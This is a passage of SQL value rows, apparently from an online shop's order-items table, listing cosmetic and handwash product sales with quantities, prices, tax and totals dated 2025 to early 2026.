(163, 441, '2025-01-28 07:31:39', '2025-01-28 07:31:39', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(164, 442, '2025-01-28 07:32:02', '2025-01-28 07:32:02', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(165, 444, '2025-02-07 15:51:21', '2025-02-07 15:51:21', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(166, 445, '2025-02-09 16:26:21', '2025-02-09 16:26:21', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(167, 446, '2025-02-23 04:23:10', '2025-02-23 04:23:10', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(168, 448, '2025-03-03 03:01:53', '2025-03-03 03:01:53', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(169, 449, '2025-03-05 14:27:58', '2025-03-05 14:27:58', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(170, 450, '2025-03-08 11:10:29', '2025-03-08 12:43:59', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2,3', NULL, 0, 0, 1.0000, 65.0000, 54.0000, 54.0000, NULL, 20.0000, 702.0000, 702.0000, 0.0000, 0.0000, 0.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(171, 450, '2025-03-08 11:10:30', '2025-03-08 12:54:25', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 32.0000, 321.0000, 321.0000, NULL, 20.0000, 2054.4000, 2054.4000, 0.0000, 0.0000, 0.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(172, 450, '2025-03-08 11:10:31', '2025-03-08 11:17:15', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2,3', NULL, 0, 0, 100.0000, 5.0000, 111.0000, 111.0000, NULL, 20.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 555.0000, 555.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 555.0000, 555.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(173, 450, '2025-03-08 11:10:32', '2025-03-08 12:54:26', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 32.0000, 321.0000, 321.0000, NULL, 20.0000, 2054.4000, 2054.4000, 0.0000, 0.0000, 0.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 10272.0000, 10272.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(174, 450, '2025-03-08 11:11:09', '2025-03-08 12:29:09', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 34.0000, 421.0000, 421.0000, NULL, 20.0000, 2862.8000, 2862.8000, 0.0000, 0.0000, 0.0000, 14314.0000, 14314.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 14314.0000, 14314.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(175, 450, '2025-03-08 11:11:10', '2025-03-08 12:40:55', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 2.0000, 643.0000, 643.0000, NULL, 20.0000, 257.2000, 257.2000, 0.0000, 0.0000, 0.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(176, 450, '2025-03-08 11:11:12', '2025-03-08 12:50:46', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 3.0000, 234.0000, 234.0000, NULL, 20.0000, 140.4000, 140.4000, 0.0000, 0.0000, 0.0000, 702.0000, 702.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 702.0000, 702.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(177, 451, '2025-03-09 15:52:18', '2025-03-09 15:52:18', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(178, 452, '2025-03-09 15:52:42', '2025-03-09 15:52:42', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(179, 453, '2025-03-09 15:53:01', '2025-03-09 15:53:01', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(180, 454, '2025-03-09 15:53:18', '2025-03-09 15:53:18', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(181, 455, '2025-03-09 15:53:37', '2025-03-09 15:53:37', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(182, 456, '2025-03-09 15:53:54', '2025-03-09 15:53:54', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(183, 457, '2025-03-30 07:00:32', '2025-03-30 07:00:32', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(184, 458, '2025-03-30 07:39:49', '2025-03-30 07:39:49', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(185, 459, '2025-03-30 07:43:21', '2025-03-30 07:43:21', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(186, 460, '2025-03-30 07:44:50', '2025-03-30 07:44:50', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(187, 461, '2025-03-30 07:47:56', '2025-03-30 07:47:56', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(188, 462, '2025-03-30 07:49:29', '2025-03-30 07:49:29', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(189, 463, '2025-03-30 07:51:18', '2025-03-30 07:51:18', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(190, 464, '2025-03-30 07:52:45', '2025-03-30 07:52:45', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(191, 465, '2025-03-30 07:54:45', '2025-03-30 07:54:45', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(192, 466, '2025-03-30 07:58:51', '2025-03-30 07:58:51', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(193, 471, '2025-05-05 19:58:35', '2025-05-05 19:58:35', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(194, 477, '2025-09-28 13:47:42', '2025-09-28 13:47:42', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(195, 478, '2025-09-28 15:40:49', '2025-09-28 15:40:49', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(196, 486, '2025-11-13 16:14:31', '2025-11-13 16:14:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(197, 503, '2025-12-12 15:02:44', '2025-12-12 15:02:44', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(198, 509, '2025-12-17 08:18:08', '2025-12-17 08:18:08', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(199, 511, '2025-12-26 22:20:28', '2025-12-26 22:20:28', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(200, 513, '2026-01-02 12:25:07', '2026-01-02 12:25:07', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(201, 514, '2026-01-02 23:16:00', '2026-01-02 23:16:00', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(202, 521, '2026-01-13 20:10:29', '2026-01-13 20:10:29', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(203, 523, '2026-01-21 21:30:23', '2026-01-21 21:30:23', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(204, 524, '2026-01-21 21:36:14', '2026-01-21 21:36:14', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(205, 525, '2026-01-21 22:35:36', '2026-01-21 22:35:36', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(206, 549, '2026-02-19 05:37:39', '2026-02-19 05:37:39', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(207, 553, '2026-02-26 03:16:55', '2026-02-26 03:17:19', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, '2,3', NULL, 0, 0, 0.0000, 2.0000, 32.0000, 32.0000, NULL, 20.0000, 12.8000, 12.8000, 0.0000, 0.0000, 0.0000, 64.0000, 64.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 64.0000, 64.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(208, 553, '2026-02-26 03:16:57', '2026-02-26 03:17:21', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 2.0000, 321.0000, 321.0000, NULL, 20.0000, 128.4000, 128.4000, 0.0000, 0.0000, 0.0000, 642.0000, 642.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 642.0000, 642.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(209, 553, '2026-02-26 03:16:59', '2026-02-26 03:17:13', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 2.0000, 643.0000, 643.0000, NULL, 20.0000, 257.2000, 257.2000, 0.0000, 0.0000, 0.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(210, 553, '2026-02-26 03:17:01', '2026-02-26 03:17:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 2.0000, 234.0000, 234.0000, NULL, 20.0000, 93.6000, 93.6000, 0.0000, 0.0000, 0.0000, 468.0000, 468.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 468.0000, 468.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(211, 553, '2026-02-26 03:17:03', '2026-02-26 03:17:25', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 2.0000, 421.0000, 421.0000, NULL, 20.0000, 168.4000, 168.4000, 0.0000, 0.0000, 0.0000, 842.0000, 842.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 842.0000, 842.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(212, 553, '2026-02-26 03:17:05', '2026-02-26 03:17:27', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 2.0000, 422.0000, 422.0000, NULL, 20.0000, 168.8000, 168.8000, 0.0000, 0.0000, 0.0000, 844.0000, 844.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 844.0000, 844.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(213, 553, '2026-02-26 03:17:07', '2026-02-26 03:17:23', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 2.0000, 321.0000, 321.0000, NULL, 20.0000, 128.4000, 128.4000, 0.0000, 0.0000, 0.0000, 642.0000, 642.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 642.0000, 642.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
